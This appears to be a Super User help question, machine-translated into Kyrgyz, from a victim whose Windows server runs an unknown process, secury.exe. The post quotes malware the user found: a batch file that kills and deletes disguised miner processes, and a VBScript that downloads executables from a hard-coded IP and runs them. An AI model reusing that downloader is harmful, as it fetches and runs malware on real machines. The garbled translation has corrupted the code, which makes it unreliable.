терезелер - туруктуу буу кардар bootstrapper өлтүрүүгө кантип - Super User

Мен өзүмдүн ишимди менеджер төмөнкү жагдайды бар:

Мен өзүмдүн ишимди менеджер төмөнкү жагдайды бар:

Мен аны чыгарып эмес, аны орнотуп, ошондой эле мүмкүн эмес, анткени, бул колдонмонун кандай, бирок, албетте, кардар bootstrapper Steam эмес, билбейм.

Мен бул кадам аркылуу эмес колдонмонун кандай тактаганга аракет, анда:

Мен бул сыяктуу көрүп:

MS Config Коммуналдык Мен secury.exe окшош эч нерсе табылган жок.

Мен билэ жайгашкан ачканда, мен үч материалдары көрүп:

m.bat, b.exe, 4.vbs.

Төмөндө m.bat мазмуну барат:

taskkill / е / т / м secury.exe C: \ ProgramData \ secury.exe taskkill / е / т / м kingsoft.exe taskkill / е / т / м expl0rer.exe taskkill / е / т / м ieplare.exev taskkill / е / т / м nssm.exe taskkill / е / т / м MSASCui.exe taskkill / е / т / м SystemSettlngs.exe taskkill / е / т / м SystemSetting.exe taskkill / е / т / м Process.exe taskkill / е / т / м winlnlt.exe taskkill / е / т / м WindowsUpgrade.exe taskkill / е / т / м msdc.exe taskkill / е / т / м Fiddlere.exe taskkill / е / т / м shovst.exe taskkill / е / т / м lqrtqe.exe taskkill / е / т / м apkls.exe taskkill / е / т / м winlog.exe taskkill / е / т / м svchosts.exe taskkill / е / т / м win1ogins.exe taskkill / е / т / м shovsts.exe taskkill / е / т / м fcty.exe taskkill / е / т / м soiuos.exe taskkill / е / т / м TrustedInstaller.exe дел C: \ Windows \ System32 \ soiuos.exe дел C: \ Windows \ орнотуу \ TrustedInstaller.exe дел C: \ ProgramData \ kingsoft.exe дел C: \ ProgramData \ expl0rer.exe дел C: \ ProgramData \ ieplare.exe дел C: \ ProgramData \ nssm.exe дел C: \ ProgramData \ MSASCui.exe дел C: \ Pro gramData \ SystemSettlngs.exe дел C: \ ProgramData \ SystemSetting.exe дел C: \ ProgramData \ Process.exe дел C: \ ProgramData \ winlnlt.exe дел C: \ ProgramData \ WindowsUpgrade.exe дел C: \ ProgramData \ msdc.exe дел C: \ ProgramData \ Fiddlere.exe дел C: \ ProgramData \ shovst.exe дел C: \ ProgramData \ lqrtqe.exe дел C: \ ProgramData \ apkls.exe дел C: \ ProgramData \ winlog.exe дел C: \ ProgramData \ svchosts.exe дел C: \ ProgramData \ win1ogins.exe дел C: \ ProgramData \ shovsts.exe дел C: \ ProgramData \ fcty.exe дел C: \ ProgramData \ pool.exe дел C: \ ProgramData \ pool2.exe дел C: \ ProgramData \ pool3.exe

Кийинки 4.vbs барат:

Set xPost = CreateObject ( "Microsoft.XMLHTTP") xPost.Open "ТУР", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ( "ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "C: \ ProgramData \ s2.exe", 2-Set xPost = CreateObject ( "Microsoft.XMLHTTP") xPost.Open "ТУР", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ( "ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "C: \ ProgramData \ pool2.exe", 2-CreateObject ( "WScript.Shell") иштетүү. "C: \ ProgramData \ pool3.exe" CreateObject ( "WScript.Shell") иштетүү "дел C: \ ProgramData \ pool3.exe".

кызматчым менен эсептөө ыйгарым укуктарын кыянаттык менен secury.exe токтошу үчүн эмне кылсак болот?

PS Мен отуруп толук текшерүү Avast аткарылат, бирок бул туура эмес эч нерсе табылган жок.